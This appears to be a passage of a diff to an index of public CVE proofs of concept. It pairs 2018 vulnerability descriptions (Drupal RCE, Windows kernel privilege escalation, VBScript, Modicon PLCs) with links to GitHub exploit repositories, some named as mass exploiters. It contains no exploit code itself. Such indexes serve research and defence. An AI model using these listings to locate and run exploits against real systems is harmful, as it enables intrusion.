[manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass](https://github.com/manojcode/-Win10-x64-CloudMe-Sync-1.10.9-Buffer-Overflow-SEH-DEP-Bypass) +- [latortuga71/CVE-2018-6892-Golang](https://github.com/latortuga71/CVE-2018-6892-Golang) + +### CVE-2018-6905 (2018-04-08) + +The page module in TYPO3 before 8.7.11, and 9.1.0, has XSS via $GLOBALS['TYPO3_CONF_VARS']['SYS']['sitename'], as demonstrated by an admin entering a crafted site name during the installation process. + + +- [pradeepjairamani/TYPO3-XSS-POC](https://github.com/pradeepjairamani/TYPO3-XSS-POC) +- [dnr6419/CVE-2018-6905](https://github.com/dnr6419/CVE-2018-6905) + +### CVE-2018-6961 (2018-06-11) + +VMware NSX SD-WAN Edge by VeloCloud prior to version 3.1.0 contains a command injection vulnerability in the local web UI component. This component is disabled by default and should not be enabled on untrusted networks. VeloCloud by VMware will be removing this service from the product in future releases. Successful exploitation of this issue could result in remote code execution. + + +- [bokanrb/CVE-2018-6961](https://github.com/bokanrb/CVE-2018-6961) +- [r3dxpl0it/CVE-2018-6961](https://github.com/r3dxpl0it/CVE-2018-6961) + +### CVE-2018-6981 (2018-12-04) + +VMware ESXi 6.7 without ESXi670-201811401-BG and VMware ESXi 6.5 without ESXi650-201811301-BG, VMware ESXi 6.0 without ESXi600-201811401-BG, VMware Workstation 15, VMware Workstation 14.1.3 or below, VMware Fusion 11, VMware Fusion 10.1.3 or below contain uninitialized stack memory usage in the vmxnet3 virtual network adapter which may allow a guest to execute code on the host. + + +- [LxKxC/vmxnet3Hunter](https://github.com/LxKxC/vmxnet3Hunter) + +### CVE-2018-7171 (2018-03-30) + +Directory traversal vulnerability in Twonky Server 7.0.11 through 8.5 allows remote attackers to share the contents of arbitrary directories via a .. (dot dot) in the contentbase parameter to rpc/set_all. + + +- [mechanico/sharingIsCaring](https://github.com/mechanico/sharingIsCaring) + +### CVE-2018-7197 (2018-02-18) + +An issue was discovered in Pluck through 4.7.4. A stored cross-site scripting (XSS) vulnerability allows remote unauthenticated users to inject arbitrary web script or HTML into admin/blog Reaction Comments via a crafted URL. + + +- [Alyssa-o-Herrera/CVE-2018-7197](https://github.com/Alyssa-o-Herrera/CVE-2018-7197) + +### CVE-2018-7211 (2018-02-18) + +An issue was discovered in iDashboards 9.6b. The SSO implementation is affected by a weak obfuscation library, allowing man-in-the-middle attackers to discover credentials. + + +- [c3r34lk1ll3r/CVE-2018-7211-PoC](https://github.com/c3r34lk1ll3r/CVE-2018-7211-PoC) + +### CVE-2018-7249 (2018-02-26) + +An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. Two carefully timed calls to IOCTL 0xCA002813 can cause a race condition that leads to a use-after-free. When exploited, an unprivileged attacker can run arbitrary code in the kernel. + + +- [Elvin9/NotSecDrv](https://github.com/Elvin9/NotSecDrv) + +### CVE-2018-7250 (2018-02-26) + +An issue was discovered in secdrv.sys as shipped in Microsoft Windows Vista, Windows 7, Windows 8, and Windows 8.1 before KB3086255, and as shipped in Macrovision SafeDisc. An uninitialized kernel pool allocation in IOCTL 0xCA002813 allows a local unprivileged attacker to leak 16 bits of uninitialized kernel PagedPool data. + + +- [Elvin9/SecDrvPoolLeak](https://github.com/Elvin9/SecDrvPoolLeak) + +### CVE-2018-7273 (2018-02-21) + +In the Linux kernel through 4.15.4, the floppy driver reveals the addresses of kernel functions and global variables using printk calls within the function show_floppy in drivers/block/floppy.c. An attacker can read this information from dmesg and use the addresses to find the locations of kernel code and data and bypass kernel security protections such as KASLR. + + +- [jedai47/CVE-2018-7273](https://github.com/jedai47/CVE-2018-7273) + +### CVE-2018-7284 (2018-02-22) + +A Buffer Overflow issue was discovered in Asterisk through 13.19.1, 14.x through 14.7.5, and 15.x through 15.2.1, and Certified Asterisk through 13.18-cert2. When processing a SUBSCRIBE request, the res_pjsip_pubsub module stores the accepted formats present in the Accept headers of the request. This code did not limit the number of headers it processed, despite having a fixed limit of 32. If more than 32 Accept headers were present, the code would write outside of its memory and cause a crash. + + +- [Rodrigo-D/astDoS](https://github.com/Rodrigo-D/astDoS) + +### CVE-2018-7422 (2018-03-19) + +A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php, aka absolute path traversal. + + +- [0x00-0x00/CVE-2018-7422](https://github.com/0x00-0x00/CVE-2018-7422) +- [jessisec/CVE-2018-7422](https://github.com/jessisec/CVE-2018-7422) +- [JacobEbben/CVE-2018-7422](https://github.com/JacobEbben/CVE-2018-7422) + +### CVE-2018-7448 (2018-02-26) + +Remote code execution vulnerability in /cmsms-2.1.6-install.php/index.php in CMS Made Simple version 2.1.6 allows remote attackers to inject arbitrary PHP code via the "timezone" parameter in step 4 of a fresh installation procedure. + + +- [b1d0ws/exploit-cve-2018-7448](https://github.com/b1d0ws/exploit-cve-2018-7448) + +### CVE-2018-7449 (2018-03-04) + +SEGGER FTP Server for Windows before 3.22a allows remote attackers to cause a denial of service (daemon crash) via an invalid LIST, STOR, or RETR command. + + +- [antogit-sys/CVE-2018-7449](https://github.com/antogit-sys/CVE-2018-7449) + +### CVE-2018-7489 (2018-02-26) + +FasterXML jackson-databind before 2.7.9.3, 2.8.x before 2.8.11.1 and 2.9.x before 2.9.5 allows unauthenticated remote code execution because of an incomplete fix for the CVE-2017-7525 deserialization flaw. This is exploitable by sending maliciously crafted JSON input to the readValue method of the ObjectMapper, bypassing a blacklist that is ineffective if the c3p0 libraries are available in the classpath. + + +- [tafamace/CVE-2018-7489](https://github.com/tafamace/CVE-2018-7489) + +### CVE-2018-7490 (2018-02-26) + +uWSGI before 2.0.17 mishandles a DOCUMENT_ROOT check during use of the --php-docroot option, allowing directory traversal. + + +- [qinzhu111/uWSGI-CVE-2018-7490-POC](https://github.com/qinzhu111/uWSGI-CVE-2018-7490-POC) + +### CVE-2018-7600 (2018-03-29) + +Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before 8.5.1 allows remote attackers to execute arbitrary code because of an issue affecting multiple subsystems with default or common module configurations. + + +- [g0rx/CVE-2018-7600-Drupal-RCE](https://github.com/g0rx/CVE-2018-7600-Drupal-RCE) +- [a2u/CVE-2018-7600](https://github.com/a2u/CVE-2018-7600) +- [dreadlocked/Drupalgeddon2](https://github.com/dreadlocked/Drupalgeddon2) +- [knqyf263/CVE-2018-7600](https://github.com/knqyf263/CVE-2018-7600) +- [dr-iman/CVE-2018-7600-Drupal-0day-RCE](https://github.com/dr-iman/CVE-2018-7600-Drupal-0day-RCE) +- [jirojo2/drupalgeddon2](https://github.com/jirojo2/drupalgeddon2) +- [dwisiswant0/CVE-2018-7600](https://github.com/dwisiswant0/CVE-2018-7600) +- [thehappydinoa/CVE-2018-7600](https://github.com/thehappydinoa/CVE-2018-7600) +- [sl4cky/CVE-2018-7600](https://github.com/sl4cky/CVE-2018-7600) +- [sl4cky/CVE-2018-7600-Masschecker](https://github.com/sl4cky/CVE-2018-7600-Masschecker) +- [firefart/CVE-2018-7600](https://github.com/firefart/CVE-2018-7600) +- [pimps/CVE-2018-7600](https://github.com/pimps/CVE-2018-7600) +- [lorddemon/drupalgeddon2](https://github.com/lorddemon/drupalgeddon2) +- [Hestat/drupal-check](https://github.com/Hestat/drupal-check) +- [Damian972/drupalgeddon-2](https://github.com/Damian972/drupalgeddon-2) +- [soch4n/CVE-2018-7600](https://github.com/soch4n/CVE-2018-7600) +- [happynote3966/CVE-2018-7600](https://github.com/happynote3966/CVE-2018-7600) +- [shellord/CVE-2018-7600-Drupal-RCE](https://github.com/shellord/CVE-2018-7600-Drupal-RCE) +- [r3dxpl0it/CVE-2018-7600](https://github.com/r3dxpl0it/CVE-2018-7600) +- [cved-sources/cve-2018-7600](https://github.com/cved-sources/cve-2018-7600) +- [madneal/codeql-scanner](https://github.com/madneal/codeql-scanner) +- [drugeddon/drupal-exploit](https://github.com/drugeddon/drupal-exploit) +- [shellord/Drupalgeddon-Mass-Exploiter](https://github.com/shellord/Drupalgeddon-Mass-Exploiter) +- [zhzyker/CVE-2018-7600-Drupal-POC-EXP](https://github.com/zhzyker/CVE-2018-7600-Drupal-POC-EXP) +- [rabbitmask/CVE-2018-7600-Drupal7](https://github.com/rabbitmask/CVE-2018-7600-Drupal7) +- [ynsmroztas/drupalhunter](https://github.com/ynsmroztas/drupalhunter) +- [ruthvikvegunta/Drupalgeddon2](https://github.com/ruthvikvegunta/Drupalgeddon2) +- [ludy-dev/drupal8-REST-RCE](https://github.com/ludy-dev/drupal8-REST-RCE) +- [0xAJ2K/CVE-2018-7600](https://github.com/0xAJ2K/CVE-2018-7600) +- [rafaelcaria/drupalgeddon2-CVE-2018-7600](https://github.com/rafaelcaria/drupalgeddon2-CVE-2018-7600) +- [vphnguyen/ANM_CVE-2018-7600](https://github.com/vphnguyen/ANM_CVE-2018-7600) +- [0xConstant/CVE-2018-7600](https://github.com/0xConstant/CVE-2018-7600) +- [anldori/CVE-2018-7600](https://github.com/anldori/CVE-2018-7600) +- [r0lh/CVE-2018-7600](https://github.com/r0lh/CVE-2018-7600) +- [killeveee/CVE-2018-7600](https://github.com/killeveee/CVE-2018-7600) +- [raytran54/CVE-2018-7600](https://github.com/raytran54/CVE-2018-7600) + +### CVE-2018-7602 (2018-07-19) + +A remote code execution vulnerability exists within multiple subsystems of Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple attack vectors on a Drupal site, which could result in the site being compromised. This vulnerability is related to Drupal core - Highly critical - Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this vulnerability are being exploited in the wild. + + +- [1337g/Drupalgedon3](https://github.com/1337g/Drupalgedon3) +- [happynote3966/CVE-2018-7602](https://github.com/happynote3966/CVE-2018-7602) +- [kastellanos/CVE-2018-7602](https://github.com/kastellanos/CVE-2018-7602) +- [cyberharsh/DrupalCVE-2018-7602](https://github.com/cyberharsh/DrupalCVE-2018-7602) +- [132231g/CVE-2018-7602](https://github.com/132231g/CVE-2018-7602) + +### CVE-2018-7669 (2018-04-27) + +An issue was discovered in Sitecore Sitecore.NET 8.1 rev. 151207 Hotfix 141178-1 and above. The 'Log Viewer' application is vulnerable to a directory traversal attack, allowing an attacker to access arbitrary files from the host Operating System using a sitecore/shell/default.aspx?xmlcontrol=LogViewerDetails&file= URI. Validation is performed to ensure that the text passed to the 'file' parameter correlates to the correct log file directory. This filter can be bypassed by including a valid log filename and then appending a traditional 'dot dot' style attack. + + +- [palaziv/CVE-2018-7669](https://github.com/palaziv/CVE-2018-7669) + +### CVE-2018-7690 (2018-12-13) + +A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access + + +- [alt3kx/CVE-2018-7690](https://github.com/alt3kx/CVE-2018-7690) + +### CVE-2018-7691 (2018-12-13) + +A potential Remote Unauthorized Access in Micro Focus Fortify Software Security Center (SSC), versions 17.10, 17.20, 18.10 this exploitation could allow Remote Unauthorized Access + + +- [alt3kx/CVE-2018-7691](https://github.com/alt3kx/CVE-2018-7691) + +### CVE-2018-7747 (2018-04-20) + +Multiple cross-site scripting (XSS) vulnerabilities in the Caldera Forms plugin before 1.6.0-rc.1 for WordPress allow remote attackers to inject arbitrary web script or HTML via vectors involving (1) a greeting message, (2) the email transaction log, or (3) an imported form. + + +- [mindpr00f/CVE-2018-7747](https://github.com/mindpr00f/CVE-2018-7747) + +### CVE-2018-7750 (2018-03-13) + +transport.py in the SSH server implementation of Paramiko before 1.17.6, 1.18.x before 1.18.5, 2.0.x before 2.0.8, 2.1.x before 2.1.5, 2.2.x before 2.2.3, 2.3.x before 2.3.2, and 2.4.x before 2.4.1 does not properly check whether authentication is completed before processing other requests, as demonstrated by channel-open. A customized SSH client can simply skip the authentication step. + + +- [jm33-m0/CVE-2018-7750](https://github.com/jm33-m0/CVE-2018-7750) + +### CVE-2018-7842 (2019-05-22) + +A CWE-290: Authentication Bypass by Spoofing vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause an elevation of privilege by conducting a brute force attack on Modbus parameters sent to the controller. + + +- [yanissec/CVE-2018-7842](https://github.com/yanissec/CVE-2018-7842) + +### CVE-2018-7843 (2019-05-22) + +A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when reading memory blocks with an invalid data size or with an invalid data offset in the controller over Modbus. + + +- [yanissec/CVE-2018-7843](https://github.com/yanissec/CVE-2018-7843) + +### CVE-2018-7844 (2019-05-22) + +A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading memory blocks from the controller over Modbus. + + +- [yanissec/CVE-2018-7844](https://github.com/yanissec/CVE-2018-7844) + +### CVE-2018-7845 (2019-05-22) + +A CWE-125: Out-of-bounds Read vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of unexpected data from the controller when reading specific memory blocks in the controller over Modbus. + + +- [yanissec/CVE-2018-7845](https://github.com/yanissec/CVE-2018-7845) + +### CVE-2018-7846 (2019-05-22) + +A CWE-501: Trust Boundary Violation vulnerability on connection to the Controller exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum and Modicon Premium which could cause unauthorized access by conducting a brute force attack on Modbus protocol to the controller. + + +- [yanissec/CVE-2018-7846](https://github.com/yanissec/CVE-2018-7846) + +### CVE-2018-7848 (2019-05-22) + +A CWE-200: Information Exposure vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause the disclosure of SNMP information when reading files from the controller over Modbus + + +- [yanissec/CVE-2018-7848](https://github.com/yanissec/CVE-2018-7848) + +### CVE-2018-7849 (2019-05-22) + +A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum and Modicon Premium which could cause a possible Denial of Service due to improper data integrity check when sending files the controller over Modbus. + + +- [yanissec/CVE-2018-7849](https://github.com/yanissec/CVE-2018-7849) + +### CVE-2018-7852 (2019-05-22) + +A CWE-248: Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause denial of service when an invalid private command parameter is sent to the controller over Modbus. + + +- [yanissec/CVE-2018-7852](https://github.com/yanissec/CVE-2018-7852) + +### CVE-2018-7854 (2019-05-22) + +A CWE-248 Uncaught Exception vulnerability exists in all versions of the Modicon M580, Modicon M340, Modicon Quantum, and Modicon Premium which could cause a denial of Service when sending invalid debug parameters to the controller over Modbus. + + +- [yanissec/CVE-2018-7854](https://github.com/yanissec/CVE-2018-7854) + +### CVE-2018-7935 (2023-02-10) + +\nThere is a vulnerability in 21.328.01.00.00 version of the E5573Cs-322. Remote attackers could exploit this vulnerability to make the network where the E5573Cs-322 is running temporarily unavailable.\n\n + + +- [lawrenceamer/CVE-2018-7935](https://github.com/lawrenceamer/CVE-2018-7935) + +### CVE-2018-8004 (2018-08-29) + +There are multiple HTTP smuggling and cache poisoning issues when clients making malicious requests interact with Apache Traffic Server (ATS). This affects versions 6.0.0 to 6.2.2 and 7.0.0 to 7.1.3. To resolve this issue users running 6.x should upgrade to 6.2.3 or later versions and 7.x users should upgrade to 7.1.4 or later versions. + + +- [mosesrenegade/CVE-2018-8004](https://github.com/mosesrenegade/CVE-2018-8004) + +### CVE-2018-8021 (2018-11-07) + +Versions of Superset prior to 0.23 used an unsafe load method from the pickle library to deserialize data leading to possible remote code execution. Note Superset 0.23 was released prior to any Superset release under the Apache Software Foundation. + + +- [r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021](https://github.com/r3dxpl0it/Apache-Superset-Remote-Code-Execution-PoC-CVE-2018-8021) + +### CVE-2018-8032 (2018-08-02) + +Apache Axis 1.x up to and including 1.4 is vulnerable to a cross-site scripting (XSS) attack in the default servlet/services. + + +- [cairuojin/CVE-2018-8032](https://github.com/cairuojin/CVE-2018-8032) + +### CVE-2018-8033 (2018-12-13) + +In Apache OFBiz 16.11.01 to 16.11.04, the OFBiz HTTP engine (org.apache.ofbiz.service.engine.HttpEngine.java) handles requests for HTTP services via the /webtools/control/httpService endpoint. Both POST and GET requests to the httpService endpoint may contain three parameters: serviceName, serviceMode, and serviceContext. The exploitation occurs by having DOCTYPEs pointing to external references that trigger a payload that returns secret information from the host. + + +- [Cappricio-Securities/CVE-2018-8033](https://github.com/Cappricio-Securities/CVE-2018-8033) + +### CVE-2018-8038 (2018-07-05) + +Versions of Apache CXF Fediz prior to 1.4.4 do not fully disable Document Type Declarations (DTDs) when either parsing the Identity Provider response in the application plugins, or in the Identity Provider itself when parsing certain XML-based parameters. + + +- [tafamace/CVE-2018-8038](https://github.com/tafamace/CVE-2018-8038) + +### CVE-2018-8039 (2018-07-02) + +It is possible to configure Apache CXF to use the com.sun.net.ssl implementation via 'System.setProperty("java.protocol.handler.pkgs", "com.sun.net.ssl.internal.www.protocol");'. When this system property is set, CXF uses some reflection to try to make the HostnameVerifier work with the old com.sun.net.ssl.HostnameVerifier interface. However, the default HostnameVerifier implementation in CXF does not implement the method in this interface, and an exception is thrown. However, in Apache CXF prior to 3.2.5 and 3.1.16 the exception is caught in the reflection code and not properly propagated. What this means is that if you are using the com.sun.net.ssl stack with CXF, an error with TLS hostname verification will not be thrown, leaving a CXF client subject to man-in-the-middle attacks. + + +- [tafamace/CVE-2018-8039](https://github.com/tafamace/CVE-2018-8039) + +### CVE-2018-8045 (2018-03-14) + +In Joomla! 3.5.0 through 3.8.5, the lack of type casting of a variable in a SQL statement leads to a SQL injection vulnerability in the User Notes list view. + + +- [luckybool1020/CVE-2018-8045](https://github.com/luckybool1020/CVE-2018-8045) + +### CVE-2018-8060 (2018-05-10) + +HWiNFO AMD64 Kernel driver version 8.98 and lower allows an unprivileged user to send an IOCTL to the device driver. If input and/or output buffer pointers are NULL or if these buffers' data are invalid, a NULL/invalid pointer access occurs, resulting in a Windows kernel panic aka Blue Screen. This affects IOCTLs higher than 0x85FE2600 with the HWiNFO32 symbolic device name. + + +- [otavioarj/SIOCtl](https://github.com/otavioarj/SIOCtl) + +### CVE-2018-8062 (2020-10-23) + +A cross-site scripting (XSS) vulnerability on Comtrend AR-5387un devices with A731-410JAZ-C04_R02.A2pD035g.d23i firmware allows remote attackers to inject arbitrary web script or HTML via the Service Description parameter while creating a WAN service. + + +- [OscarAkaElvis/CVE-2018-8062](https://github.com/OscarAkaElvis/CVE-2018-8062) + +### CVE-2018-8065 (2018-03-12) + +An issue was discovered in the web server in Flexense SyncBreeze Enterprise 10.6.24. There is a user mode write access violation on the syncbrs.exe memory region that can be triggered by rapidly sending a variety of HTTP requests with long HTTP header values or long URIs. + + +- [EgeBalci/CVE-2018-8065](https://github.com/EgeBalci/CVE-2018-8065) + +### CVE-2018-8078 (2018-03-13) + +YzmCMS 3.7 has Stored XSS via the title parameter to advertisement/adver/edit.html. + + +- [Jx0n0/YZMCMSxss](https://github.com/Jx0n0/YZMCMSxss) + +### CVE-2018-8090 (2018-07-25) + +Quick Heal Total Security 64 bit 17.00 (QHTS64.exe), (QHTSFT64.exe) - Version 10.0.1.38; Quick Heal Total Security 32 bit 17.00 (QHTS32.exe), (QHTSFT32.exe) - Version 10.0.1.38; Quick Heal Internet Security 64 bit 17.00 (QHIS64.exe), (QHISFT64.exe) - Version 10.0.0.37; Quick Heal Internet Security 32 bit 17.00 (QHIS32.exe), (QHISFT32.exe) - Version 10.0.0.37; Quick Heal AntiVirus Pro 64 bit 17.00 (QHAV64.exe), (QHAVFT64.exe) - Version 10.0.0.37; and Quick Heal AntiVirus Pro 32 bit 17.00 (QHAV32.exe), (QHAVFT32.exe) - Version 10.0.0.37 allow DLL Hijacking because of Insecure Library Loading. + + +- [kernelm0de/CVE-2018-8090](https://github.com/kernelm0de/CVE-2018-8090) + +### CVE-2018-8097 (2018-03-14) + +io/mongo/parser.py in Eve (aka pyeve) before 0.7.5 allows remote attackers to execute arbitrary code via Code Injection in the where parameter. + + +- [SilentVoid13/CVE-2018-8097](https://github.com/SilentVoid13/CVE-2018-8097) + +### CVE-2018-8108 (2018-03-14) + +The select component in bui through 2018-03-13 has XSS because it performs an escape operation on already-escaped text, as demonstrated by workGroupList text. + + +- [zlgxzswjy/BUI-select-xss](https://github.com/zlgxzswjy/BUI-select-xss) + +### CVE-2018-8115 (2018-05-02) + +A remote code execution vulnerability exists when the Windows Host Compute Service Shim (hcsshim) library fails to properly validate input while importing a container image, aka "Windows Host Compute Service Shim Remote Code Execution Vulnerability." This affects Windows Host Compute. + + +- [aquasecurity/scan-cve-2018-8115](https://github.com/aquasecurity/scan-cve-2018-8115) + +### CVE-2018-8120 (2018-05-09) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows Server 2008, Windows 7, Windows Server 2008 R2. This CVE ID is unique from CVE-2018-8124, CVE-2018-8164, CVE-2018-8166. + + +- [bigric3/cve-2018-8120](https://github.com/bigric3/cve-2018-8120) +- [rip1s/CVE-2018-8120](https://github.com/rip1s/CVE-2018-8120) +- [ne1llee/cve-2018-8120](https://github.com/ne1llee/cve-2018-8120) +- [alpha1ab/CVE-2018-8120](https://github.com/alpha1ab/CVE-2018-8120) +- [EVOL4/CVE-2018-8120](https://github.com/EVOL4/CVE-2018-8120) +- [ozkanbilge/CVE-2018-8120](https://github.com/ozkanbilge/CVE-2018-8120) +- [qiantu88/CVE-2018-8120](https://github.com/qiantu88/CVE-2018-8120) +- [Y0n0Y/cve-2018-8120-exp](https://github.com/Y0n0Y/cve-2018-8120-exp) +- [StartZYP/CVE-2018-8120](https://github.com/StartZYP/CVE-2018-8120) +- [wikiZ/cve-2018-8120](https://github.com/wikiZ/cve-2018-8120) + +### CVE-2018-8172 (2018-07-11) + +A remote code execution vulnerability exists in Visual Studio software when the software does not check the source markup of a file for an unbuilt project, aka "Visual Studio Remote Code Execution Vulnerability." This affects Microsoft Visual Studio, Expression Blend 4. + + +- [SyFi/CVE-2018-8172](https://github.com/SyFi/CVE-2018-8172) + +### CVE-2018-8174 (2018-05-09) + +A remote code execution vulnerability exists in the way that the VBScript engine handles objects in memory, aka "Windows VBScript Engine Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [0x09AL/CVE-2018-8174-msf](https://github.com/0x09AL/CVE-2018-8174-msf) +- [Yt1g3r/CVE-2018-8174_EXP](https://github.com/Yt1g3r/CVE-2018-8174_EXP) +- [SyFi/CVE-2018-8174](https://github.com/SyFi/CVE-2018-8174) +- [orf53975/Rig-Exploit-for-CVE-2018-8174](https://github.com/orf53975/Rig-Exploit-for-CVE-2018-8174) +- [piotrflorczyk/cve-2018-8174_analysis](https://github.com/piotrflorczyk/cve-2018-8174_analysis) +- [likekabin/CVE-2018-8174-msf](https://github.com/likekabin/CVE-2018-8174-msf) +- [ruthlezs/ie11_vbscript_exploit](https://github.com/ruthlezs/ie11_vbscript_exploit) +- [ericisnotrealname/CVE-2018-8174_EXP](https://github.com/ericisnotrealname/CVE-2018-8174_EXP) +- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP) +- [www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-](https://github.com/www201001/https-github.com-iBearcat-CVE-2018-8174_EXP.git-) +- [delina1/CVE-2018-8174](https://github.com/delina1/CVE-2018-8174) +- [delina1/CVE-2018-8174_EXP](https://github.com/delina1/CVE-2018-8174_EXP) +- [DarkFlameMaster-bit/CVE-2018-8174_EXP](https://github.com/DarkFlameMaster-bit/CVE-2018-8174_EXP) +- [lisinan988/CVE-2018-8174-exp](https://github.com/lisinan988/CVE-2018-8174-exp) +- [sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP](https://github.com/sinisterghost/https-github.com-iBearcat-CVE-2018-8174_EXP) + +### CVE-2018-8208 (2018-06-14) + +An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8214. + + +- [kaisaryousuf/CVE-2018-8208](https://github.com/kaisaryousuf/CVE-2018-8208) + +### CVE-2018-8214 (2018-06-14) + +An elevation of privilege vulnerability exists in Windows when Desktop Bridge does not properly manage the virtual registry, aka "Windows Desktop Bridge Elevation of Privilege Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. This CVE ID is unique from CVE-2018-8208. + + +- [guwudoor/CVE-2018-8214](https://github.com/guwudoor/CVE-2018-8214) + +### CVE-2018-8284 (2018-07-11) + +A remote code execution vulnerability exists when the Microsoft .NET Framework fails to validate input properly, aka ".NET Framework Remote Code Injection Vulnerability." This affects Microsoft .NET Framework 2.0, Microsoft .NET Framework 3.0, Microsoft .NET Framework 4.6.2/4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.5.2, Microsoft .NET Framework 4.6, Microsoft .NET Framework 4.7/4.7.1/4.7.2, Microsoft .NET Framework 4.7.1/4.7.2, Microsoft .NET Framework 3.5, Microsoft .NET Framework 3.5.1, Microsoft .NET Framework 4.6/4.6.1/4.6.2, Microsoft .NET Framework 4.6/4.6.1/4.6.2/4.7/4.7.1/4.7.1/4.7.2, Microsoft .NET Framework 4.7.2. + + +- [quantiti/CVE-2018-8284-Sharepoint-RCE](https://github.com/quantiti/CVE-2018-8284-Sharepoint-RCE) + +### CVE-2018-8353 (2018-08-15) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8389, CVE-2018-8390. + + +- [whereisr0da/CVE-2018-8353-POC](https://github.com/whereisr0da/CVE-2018-8353-POC) + +### CVE-2018-8389 (2018-08-15) + +A remote code execution vulnerability exists in the way that the scripting engine handles objects in memory in Internet Explorer, aka "Scripting Engine Memory Corruption Vulnerability." This affects Internet Explorer 9, Internet Explorer 11, Internet Explorer 10. This CVE ID is unique from CVE-2018-8353, CVE-2018-8355, CVE-2018-8359, CVE-2018-8371, CVE-2018-8372, CVE-2018-8373, CVE-2018-8385, CVE-2018-8390. + + +- [sharmasandeepkr/cve-2018-8389](https://github.com/sharmasandeepkr/cve-2018-8389) + +### CVE-2018-8410 (2018-09-13) + +An elevation of privilege vulnerability exists when the Windows Kernel API improperly handles registry objects in memory, aka "Windows Registry Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [trapmine/CVE-2018-8410](https://github.com/trapmine/CVE-2018-8410) + +### CVE-2018-8414 (2018-08-15) + +A remote code execution vulnerability exists when the Windows Shell does not properly validate file paths, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows 10 Servers, Windows 10. + + +- [whereisr0da/CVE-2018-8414-POC](https://github.com/whereisr0da/CVE-2018-8414-POC) + +### CVE-2018-8420 (2018-09-13) + +A remote code execution vulnerability exists when the Microsoft XML Core Services MSXML parser processes user input, aka "MS XML Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [idkwim/CVE-2018-8420](https://github.com/idkwim/CVE-2018-8420) + +### CVE-2018-8440 (2018-09-13) + +An elevation of privilege vulnerability exists when Windows improperly handles calls to Advanced Local Procedure Call (ALPC), aka "Windows ALPC Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [sourceincite/CVE-2018-8440](https://github.com/sourceincite/CVE-2018-8440) + +### CVE-2018-8453 (2018-10-10) + +An elevation of privilege vulnerability exists in Windows when the Win32k component fails to properly handle objects in memory, aka "Win32k Elevation of Privilege Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2019, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers. + + +- [Mkv4/cve-2018-8453-exp](https://github.com/Mkv4/cve-2018-8453-exp) +- [ze0r/cve-2018-8453-exp](https://github.com/ze0r/cve-2018-8453-exp) +- [thepwnrip/leHACK-Analysis-of-CVE-2018-8453](https://github.com/thepwnrip/leHACK-Analysis-of-CVE-2018-8453) + +### CVE-2018-8495 (2018-10-10) + +A remote code execution vulnerability exists when Windows Shell improperly handles URIs, aka "Windows Shell Remote Code Execution Vulnerability." This affects Windows Server 2016, Windows 10, Windows 10 Servers. + + +- [whereisr0da/CVE-2018-8495-POC](https://github.com/whereisr0da/CVE-2018-8495-POC) + +### CVE-2018-8581 (2018-11-14) + +An elevation of privilege vulnerability exists in Microsoft Exchange Server, aka "Microsoft Exchange Server 